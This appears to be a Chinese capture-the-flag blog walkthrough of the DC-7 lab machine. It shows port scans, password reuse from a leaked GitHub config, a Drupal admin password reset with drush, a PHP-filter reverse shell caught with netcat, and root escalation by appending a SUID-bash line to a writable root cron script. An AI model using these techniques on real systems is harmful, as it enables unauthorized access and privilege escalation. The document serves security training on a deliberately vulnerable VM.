DC-7 靶机

DC-7 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.126
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 02:59 EDT
Nmap scan report for 192.168.56.126
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A8:C2:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds

只开放了两个端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.126  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 03:00 EDT
Nmap scan report for 192.168.56.126
Host is up (0.00052s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:A8:C2:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds

UDP 扫描没收获

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.126               
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 03:03 EDT
Nmap scan report for 192.168.56.126
Host is up (0.00077s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Welcome to DC-7 | D7
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: Drupal 8 (https://www.drupal.org)
MAC Address: 08:00:27:A8:C2:95 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.76 seconds

robots.txt 文件,nmap 漏洞脚本扫描一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.126               
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 03:07 EDT
Nmap scan report for 192.168.56.126
Host is up (0.00042s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.126
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.126:80/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.56.126:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/node/1
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.56.126:80/user/password
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.56.126:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/node/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/search/node/help
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.56.126:80/search/node/
|     Form id: search-form
|     Form action: /search/node/
|     
|     Path: http://192.168.56.126:80/search/node/
|     Form id: search-block-form
|_    Form action: /search/node
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /INSTALL.txt: Drupal file
|   /: Drupal version 8 
|_  /README.txt: Interesting, a readme.
MAC Address: 08:00:27:A8:C2:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 115.43 seconds

依然没收获,看看 web 界面吧

web 服务查看

提示爆破和目录爆破是无效的,要跳出靶机向外看,这句话卡了我好久,甚至尝试了用 drupal 的新漏洞尝试能不能打进去,都失败了。唯一能确定的是,我通过重置密码的界面,确定了 DC7USER 是一个用户名。

网络情报

最后看了眼 WP,才意识到这个 @DC7USER 实际上常见于 GitHub 或者推特的个人账户,一是自己敏感度的问题,二是一些网络习惯。

点进去 github 链接,发现是后台的源码,也很合理。接下来思路就很顺畅了,找配置文件看看数据库密码是否被重用

密码重用

用用户名和密码登录后台失败,考虑到还开着 22 端口因此尝试 ssh 登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[~/Downloads/dc_7]
└─$ ssh dc7user@192.168.56.127    
The authenticity of host '192.168.56.127 (192.168.56.127)' can't be established.
ED25519 key fingerprint is SHA256:BDWqBUcitB8KKGYDyoeZkt2C/aXhZ7gi5xSEtOSB+Rk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.127' (ED25519) to the list of known hosts.
dc7user@192.168.56.127's password: 
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$ whoami
dc7user
dc7user@dc-7:~$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
dc7user@dc-7:~$ sudo -l
-bash: sudo: command not found
dc7user@dc-7:/usr/bin$ uname -a
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux

看看家目录下有没有什么有价值的东西

1
2
3
4
5
6
7
8
9
10
11
12
dc7user@dc-7:~$ ls -liah
total 40K
262914 drwxr-xr-x 5 dc7user dc7user 4.0K Aug 30  2019 .
262321 drwxr-xr-x 3 root    root    4.0K Aug 29  2019 ..
143381 drwxr-xr-x 2 dc7user dc7user 4.0K Aug 30  2019 backups
269898 lrwxrwxrwx 1 dc7user dc7user    9 Aug 29  2019 .bash_history -> /dev/null
268307 -rw-r--r-- 1 dc7user dc7user  220 Aug 29  2019 .bash_logout
268283 -rw-r--r-- 1 dc7user dc7user 3.9K Aug 29  2019 .bashrc
271693 drwxr-xr-x 3 dc7user dc7user 4.0K Aug 29  2019 .drush
143656 drwx------ 3 dc7user dc7user 4.0K Aug 29  2019 .gnupg
272762 -rw------- 1 dc7user dc7user 7.8K Aug 30  2019 mbox
268426 -rw-r--r-- 1 dc7user dc7user  675 Aug 29  2019 .profile

有个 mbox 文件和.drush, .gnupg 文件夹,问问 chatgpt 吧

进入到.drush 文件夹中并没有看到 yml 文件,那就先看看 mbox 吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
dc7user@dc-7:~$ cat mbox

From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3EPu-0000CV-5C
        for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

定时任务文件

看起来似乎是邮件提示,里面提到了 /opt/scripts/backups.sh 文件,看一看这个文件的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

dc7user@dc-7:/opt/scripts$ ls -alih
total 12K
269846 drwxr-xr-x 2 root www-data 4.0K Aug 29  2019 .
262385 drwxr-xr-x 3 root root     4.0K Aug 29  2019 ..
272756 -rwxrwxr-x 1 root www-data  520 Aug 29  2019 backups.sh

感觉像个定时任务,定期把备份文件,并且把文件用 gpg 工具加密后存放在用户家目录的 backups 目录下。除此之外还有个比较有意思的事情,这个文件的属主是 root,但是却被划归到 www-data组里 ,并且 www-data 的组成员还有对这个文件的修改权限。那接下来考虑考虑如何登录到后台反弹 shell。还有个问题是上述代码里提到了关于 gpg 工具的使用,问问 chatgpt

gpg 解密

那我们可以尝试进行解密,然后拿到 sql 文件,找找其中有没有登录用户的密码

使用上述命令解压获得 sql 文件,里面全是 sql 语句,那我们就找找已知的一个用户 dc7user,我这里用 vscode 打开,然后搜索,找到了插入密码的语句,尝试破解,但是这是 drupal 自己的加密算法……john 的 format 中没有这个算法,使用在线工具也没得到答案

既然 gpg 命令用上了,那么 drush 命令有什么作用呢

drush 用户管理

可以进行用户管理,那我们可以修改 admin 用户的密码(sql 语句中可以判断出还有个 admin 用户),刚开始直接使用命令产生了报错

我们尝试切换到网站目录下,再运行一次命令

1
2
dc7user@dc-7:/var/www/html$ drush user:password admin --password="123456"
Changed password for admin                                                                               [success]

drupal后台getshell

成功更换了密码,登录后台。但是我找了半天都没有找到如何上传或者修改文件来 getshell,我尝试了搜索 drupal upload php drupal upload php filedrupal upload php shell ,有个视频点进去How To Upload Shell in Drupal (Easy Way) - YouTube

需要开启 php filter 模块

但我在界面里没找到,看来需要自己手动安装

尝试找找如何下载这个模块,点进第一个链接 PHP | Drupal.org

在页面最下面找到了下载链接,将其下载到本地然后上传上去

安装成功,可能按照视频里那样,将其开启了。选中该模块,下滑拉到页面最下方,选择 install

得到界面提示 Module PHP Filter has been enabled.

新建内容

选择类型为 phpcode

刚开始传了个最简单 php,一下子就断开了连接。换了个经典 reverseshell

开启监听后,再点 save,成功反弹 shell

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Downloads/dc_7]
└─$ sudo nc -lvnp 443
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.127] 43874
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
 23:26:39 up 23 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dc7user  pts/0    192.168.56.106   23:16    8:23   0.02s  0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

完善一下 shell

1
2
3
4
5
6
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-7:/$ cd /opt/scripts
cd /opt/scripts
www-data@dc-7:/opt/scripts$ ls
ls
backups.sh

提权

把 sh 文件修改一下

1
2
3
4
5
www-data@dc-7:/opt/scripts$ cat backups.sh
cat backups.sh
#!/bin/bash
www-data@dc-7:/opt/scripts$ echo "cp /bin/bash /tmp/bash;chmod +xs /tmp/bash" >> backups.sh
<n/bash /tmp/bash;chmod +xs /tmp/bash" >> backups.sh

等了约十分钟左右,在 tmp 中看到了 bash 文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
dc7user@dc-7:/tmp$ ls -laih
total 6.4M
   297 drwxrwxrwt  9 root    root    4.0K Jul 11 22:15 .
     2 drwxr-xr-x 22 root    root    4.0K Aug 29  2019 ..
 19744 -rwxr-xr-x  1 dc7user dc7user  520 Jul 11 18:55 backups.sh.bak
 19749 -rwsr-sr-x  1 root    root    1.1M Jul 11 22:15 bash
142361 drwxrwxrwt  2 root    root    4.0K Jul 11 18:47 .font-unix
140696 drwxrwxrwt  2 root    root    4.0K Jul 11 18:47 .ICE-unix
142662 drwx------  3 root    root    4.0K Jul 11 18:47 systemd-private-08c188e365d948dfb5100a1d5a8a6631-apache2.service-EHVFfc                                                                                                          
142543 drwx------  3 root    root    4.0K Jul 11 18:47 systemd-private-08c188e365d948dfb5100a1d5a8a6631-systemd-timesyncd.service-VQL1CO                                                                                                
142541 drwxrwxrwt  2 root    root    4.0K Jul 11 18:47 .Test-unix
 19747 -rw-r--r--  1 dc7user dc7user 5.3M Jul 11 21:18 website.sql
131153 drwxrwxrwt  2 root    root    4.0K Jul 11 18:47 .X11-unix
141106 drwxrwxrwt  2 root    root    4.0K Jul 11 18:47 .XIM-unix
dc7user@dc-7:/tmp$ ./bash -p
bash-4.4# whoami
root
bash-4.4# cd /root
bash-4.4# ls
theflag.txt
bash-4.4# cat theflag.txt




888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

knowledge_database > vulnhub
DC-7 靶机
https://i3eg1nner.github.io/2023/07/c67b9582251d.html
作者
I3eg1nner
发布于
2023年7月11日
许可协议